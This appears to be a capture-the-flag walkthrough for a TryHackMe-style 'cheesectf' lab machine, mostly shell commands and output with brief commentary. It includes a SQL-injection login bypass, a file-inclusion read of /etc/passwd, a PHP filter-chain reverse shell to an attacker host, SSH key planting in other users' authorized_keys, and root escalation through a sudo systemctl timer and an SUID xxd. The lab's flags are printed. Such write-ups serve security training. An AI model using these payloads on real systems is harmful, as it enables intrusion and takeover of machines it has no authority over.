Hack into the machine and get the flags!
THM{9f2ce3df1beeecaf695b3a8560c682704c31b17a}
THM{dca75486094810807faf4b7b0a929b11e5e0167c}
death@esther:~$ nmap 10.10.228.119 -sV -T 4
PORT STATE SERVICE VERSION
1/tcp open tcpmux?
3/tcp open compressnet?
340/tcp open http Motorola cable modem webadmin
366/tcp open odmr?
389/tcp open telnet Allied Telesis x900-series switch telnetd
406/tcp open melange Melange Chat Server 3VhUqW
407/tcp open pop3-proxy AVG pop3 proxy 346/67007
416/tcp open silverplatter?
417/tcp open onmux?
425/tcp open telnet
427/tcp open telnet
443/tcp open https?
444/tcp open smtp IMail NT-ESMTP ..._.p..c
445/tcp open http Corel Paradox relational database web interface 9.X (Embedded BWS 1.0b3)
458/tcp open printer Microsoft lpd
dirsearch -u 10.10.228.119
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460
Output File: /home/death/reports/_10.10.228.119/_24-09-28_01-34-24.txt
Target: http://10.10.228.119/
[01:34:24] Starting:
[01:34:33] 403 - 278B - /.ht_wsr.txt
[01:34:33] 403 - 278B - /.htaccess.bak1
[01:34:33] 403 - 278B - /.htaccess.sample
[01:34:33] 403 - 278B - /.htaccess.orig
[01:34:33] 403 - 278B - /.htaccess.save
[01:34:33] 403 - 278B - /.htaccess_orig
[01:34:33] 403 - 278B - /.htaccess_extra
[01:34:33] 403 - 278B - /.htaccessBAK
[01:34:33] 403 - 278B - /.htaccess_sc
[01:34:33] 403 - 278B - /.htaccessOLD2
[01:34:33] 403 - 278B - /.htaccessOLD
[01:34:33] 403 - 278B - /.html
[01:34:33] 403 - 278B - /.htpasswd_test
[01:34:33] 403 - 278B - /.htm
[01:34:33] 403 - 278B - /.htpasswds
[01:34:33] 403 - 278B - /.httr-oauth
[01:34:35] 403 - 278B - /.php
[01:35:14] 301 - 315B - /images -> http://10.10.228.119/images/
[01:35:14] 200 - 485B - /images/
[01:35:18] 200 - 370B - /login.php
[01:35:25] 200 - 254B - /orders.html
[01:35:34] 403 - 278B - /server-status/
[01:35:34] 403 - 278B - /server-status
[01:35:43] 200 - 254B - /users.html
Task Completed
' || '1'='1';-- -
http://10.10.228.119/secret-script.php?file=/etc/passwd
git clone https://github.com/synacktiv/php_filter_chain_generator.git && cd php_filter_chain_generator && clear && ls
python3 php_filter_chain_generator.py --chain "<?php exec('/bin/bash -c \"bash -i >& /dev/tcp/PUT-YOUR-IP-HERE/4444 0>&1\"'); ?>" | grep "^php" > payload.txt
nc -lnvp 4444
curl "http://10.10.228.119/secret-script.php?file=$(cat payload.txt)"
Linpease found /home/comt/.ssh/authorized_keys, which can be modified. We can create our own SSH key pair on our machine and add the public key to this file so we are allowimg us to log in.
ssh-keygen -t rsa
death@esther:~$ cat .ssh/id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDAFK2k5zBYD1W7EtVkTHU6WcmMw/TOS7WpXtZsiR6QmgwZWv7KzZ43OVTXJ22s8os5NnLp0ABrr0CwjVFoH5uDYcAzKEZp3GtbLVr0TZaNT6Vds8SeZ+5RZzGs/84Ue5FBAQVeak/5+wjZoYezOTV9c7YrkIDSS1Rs0xQ0zfjcIdumzhM5grL+ldpa1HB1J1PzBDfkP2hWwL0pt4et6GhCtpGkYSyS8rLwkU2G/S/qB0iB/OM2hGeWHpbIhQDAB15bVnzjQksBNeagdlFHmQ90pjVG0oTaWp3hpzMrLUav/6Vt/1O2HE8KZ11erIDMgIpNc5nbvSWJfCDFH4JX1/UFod0v/lQTm6LEsnSf1E4CTK/FVAAKuYAd6IM8Ul1//Re2x9Eh5oRRVpIGVwq83di3N8mKiSSLHirL7k+SrkmViJ+hJtaC6FbbxSikjnq5vdqs6k9CzXk6aQKD29NY/npFvKTjxDEJDKiUr7IDOvKLKMx6BS2T7bVePBGidNxwxY8= death@esther
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDAFK2k5zBYD1W7EtVkTHU6WcmMw/TOS7WpXtZsiR6QmgwZWv7KzZ43OVTXJ22s8os5NnLp0ABrr0CwjVFoH5uDYcAzKEZp3GtbLVr0TZaNT6Vds8SeZ+5RZzGs/84Ue5FBAQVeak/5+wjZoYezOTV9c7YrkIDSS1Rs0xQ0zfjcIdumzhM5grL+ldpa1HB1J1PzBDfkP2hWwL0pt4et6GhCtpGkYSyS8rLwkU2G/S/qB0iB/OM2hGeWHpbIhQDAB15bVnzjQksBNeagdlFHmQ90pjVG0oTaWp3hpzMrLUav/6Vt/1O2HE8KZ11erIDMgIpNc5nbvSWJfCDFH4JX1/UFod0v/lQTm6LEsnSf1E4CTK/FVAAKuYAd6IM8Ul1//Re2x9Eh5oRRVpIGVwq83di3N8mKiSSLHirL7k+SrkmViJ+hJtaC6FbbxSikjnq5vdqs6k9CzXk6aQKD29NY/npFvKTjxDEJDKiUr7IDOvKLKMx6BS2T7bVePBGidNxwxY8= death@esther
" >> /home/comte/.ssh/authorized_keys
ssh -i id_rsa comte@10.10.228.119
comte@cheesectf:~$ cat user.txt
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣴⣶⣤⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⡾⠋⠀⠉⠛⠻⢶⣦⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⠟⠁⣠⣴⣶⣶⣤⡀⠈⠉⠛⠿⢶⣤⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣴⡿⠃⠀⢰⣿⠁⠀⠀⢹⡷⠀⠀⠀⠀⠀⠈⠙⠻⠷⣶⣤⣀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣾⠋⠀⠀⠀⠈⠻⠷⠶⠾⠟⠁⠀⠀⣀⣀⡀⠀⠀⠀⠀⠀⠉⠛⠻⢶⣦⣄⡀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣴⠟⠁⠀⠀⢀⣀⣀⡀⠀⠀⠀⠀⠀⠀⣼⠟⠛⢿⡆⠀⠀⠀⠀⠀⣀⣤⣶⡿⠟⢿⡇
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⡿⠋⠀⠀⣴⡿⠛⠛⠛⠛⣿⡄⠀⠀⠀⠀⠻⣶⣶⣾⠇⢀⣀⣤⣶⠿⠛⠉⠀⠀⠀⢸⡇
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣾⠟⠀⠀⠀⠀⢿⣦⡀⠀⠀⠀⣹⡇⠀⠀⠀⠀⠀⣀⣤⣶⡾⠟⠋⠁⠀⠀⠀⠀⠀⣠⣴⠾⠇
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣴⡿⠁⠀⠀⠀⠀⠀⠀⠙⠻⠿⠶⠾⠟⠁⢀⣀⣤⡶⠿⠛⠉⠀⣠⣶⠿⠟⠿⣶⡄⠀⠀⣿⡇⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣶⠟⢁⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣠⣴⠾⠟⠋⠁⠀⠀⠀⠀⢸⣿⠀⠀⠀⠀⣼⡇⠀⠀⠙⢷⣤⡀
⠀⠀⠀⠀⠀⠀⠀⠀⣠⣾⠟⠁⠀⣾⡏⢻⣷⠀⠀⠀⢀⣠⣴⡶⠟⠛⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠻⣷⣤⣤⣴⡟⠀⠀⠀⠀⠀⢻⡇
⠀⠀⠀⠀⠀⠀⣠⣾⠟⠁⠀⠀⠀⠙⠛⢛⣋⣤⣶⠿⠛⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠉⠁⠀⠀⠀⠀⠀⠀⢸⡇
⠀⠀⠀⠀⣠⣾⠟⠁⠀⢀⣀⣤⣤⡶⠾⠟⠋⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣤⣤⣤⣤⣤⣤⡀⠀⠀⠀⠀⠀⢸⡇
⠀⠀⣠⣾⣿⣥⣶⠾⠿⠛⠋⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣶⠶⣶⣤⣀⠀⠀⠀⠀⠀⢠⡿⠋⠁⠀⠀⠀⠈⠉⢻⣆⠀⠀⠀⠀⢸⡇
⠀⢸⣿⠛⠉⠁⠀⢀⣠⣴⣶⣦⣀⠀⠀⠀⠀⠀⠀⠀⣠⡿⠋⠀⠀⠀⠉⠻⣷⡀⠀⠀⠀⣿⡇⠀⠀⠀⠀⠀⠀⠀⠘⣿⠀⠀⠀⠀⢸⡇
⠀⢸⣿⠀⠀⠀⣴⡟⠋⠀⠀⠈⢻⣦⠀⠀⠀⠀⠀⢰⣿⠁⠀⠀⠀⠀⠀⠀⢸⣷⠀⠀⠀⢻⣧⠀⠀⠀⠀⠀⠀⠀⢀⣿⠀⠀⠀⠀⢸⡇
⠀⢸⡇⠀⠀⠀⢿⡆⠀⠀⠀⠀⢰⣿⠀⠀⠀⠀⠀⢸⣿⠀⠀⠀⠀⠀⠀⠀⣸⡟⠀⠀⠀⠀⠙⢿⣦⣄⣀⣀⣠⣤⡾⠋⠀⠀⠀⠀⢸⡇
⠀⢸⡇⠀⠀⠀⠘⣿⣄⣀⣠⣴⡿⠁⠀⠀⠀⠀⠀⠀⢿⣆⠀⠀⠀⢀⣠⣾⠟⠁⠀⠀⠀⠀⠀⠀⠀⠉⠉⠉⠉⠉⠀⠀⠀⣀⣤⣴⠿⠃
⠀⠸⣷⡄⠀⠀⠀⠈⠉⠉⠉⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⠻⠿⠿⠛⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣠⣴⡶⠟⠋⠉⠀⠀⠀
⠀⠀⠈⢿⣆⠀⠀⠀⠀⠀⠀⠀⣀⣤⣴⣶⣶⣤⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣴⡶⠿⠛⠉⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⢨⣿⠀⠀⠀⠀⠀⠀⣼⡟⠁⠀⠀⠀⠹⣷⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣤⣶⠿⠛⠉⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣠⡾⠋⠀⠀⠀⠀⠀⠀⢻⣇⠀⠀⠀⠀⢀⣿⠀⠀⠀⠀⠀⠀⢀⣠⣤⣶⠿⠛⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⢠⣾⠋⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣤⣤⣤⣴⡿⠃⠀⠀⣀⣤⣶⠾⠛⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠉⠉⣀⣠⣴⡾⠟⠋⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣤⡶⠿⠛⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⣿⡇⠀⠀⠀⠀⣀⣤⣴⠾⠟⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⢻⣧⣤⣴⠾⠟⠛⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠘⠋⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
THM{9f2ce3df1beeecaf695b3a8560c682704c31b17a}
comte@cheesectf:~$ sudo -l
User comte may run the following commands on cheesectf:
(ALL) NOPASSWD: /bin/systemctl daemon-reload
(ALL) NOPASSWD: /bin/systemctl restart exploit.timer
(ALL) NOPASSWD: /bin/systemctl start exploit.timer
(ALL) NOPASSWD: /bin/systemctl enable exploit.timer
comte@cheesectf:~$
We can execute systemctl and modify a file called exploit.timer, which can be used to run an exploit service
comte@cheesectf:/etc/systemd/system$ cat exploit.service
[Unit]
Description=Exploit Service
[Service]
Type=oneshot
ExecStart=/bin/bash -c "/bin/cp /usr/bin/xxd /opt/xxd && /bin/chmod +sx /opt/xxd"
comte@cheesectf:/etc/systemd/system$ cat exploit.timer
[Unit]
Description=Exploit Timer
[Timer]
OnBootSec=
[Install]
WantedBy=timers.target
comte@cheesectf:/etc/systemd/system$
It will trigger xxd when we run it, if u dont no about xxd its an binarry function we can read about it on gtfobins
According to this we can get simply root privileges writting the ssh key we generated with access to the xxd binary.
sudo systemctl daemon-reload
sudo systemctl start exploit.time
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDAFK2k5zBYD1W7EtVkTHU6WcmMw/TOS7WpXtZsiR6QmgwZWv7KzZ43OVTXJ22s8os5NnLp0ABrr0CwjVFoH5uDYcAzKEZp3GtbLVr0TZaNT6Vds8SeZ+5RZzGs/84Ue5FBAQVeak/5+wjZoYezOTV9c7YrkIDSS1Rs0xQ0zfjcIdumzhM5grL+ldpa1HB1J1PzBDfkP2hWwL0pt4et6GhCtpGkYSyS8rLwkU2G/S/qB0iB/OM2hGeWHpbIhQDAB15bVnzjQksBNeagdlFHmQ90pjVG0oTaWp3hpzMrLUav/6Vt/1O2HE8KZ11erIDMgIpNc5nbvSWJfCDFH4JX1/UFod0v/lQTm6LEsnSf1E4CTK/FVAAKuYAd6IM8Ul1//Re2x9Eh5oRRVpIGVwq83di3N8mKiSSLHirL7k+SrkmViJ+hJtaC6FbbxSikjnq5vdqs6k9CzXk6aQKD29NY/npFvKTjxDEJDKiUr7IDOvKLKMx6BS2T7bVePBGidNxwxY8= death@esther" | xxd | /opt/xxd -r - "/root/.ssh/authorized_keys"
ssh -i id_rsa root@10.10.228.119
root@cheesectf:~# cat /root/root.txt
_ _ _ _ __
___| |__ ___ ___ ___ ___ (_)___ | (_)/ _| ___
/ __| '_ \ / _ \/ _ \/ __|/ _ \ | / __| | | | |_ / _ \
| (__| | | | __/ __/\__ \ __/ | \__ \ | | | _| __/
\___|_| |_|\___|\___||___/\___| |_|___/ |_|_|_| \___|
THM{dca75486094810807faf4b7b0a929b11e5e0167c}
🙂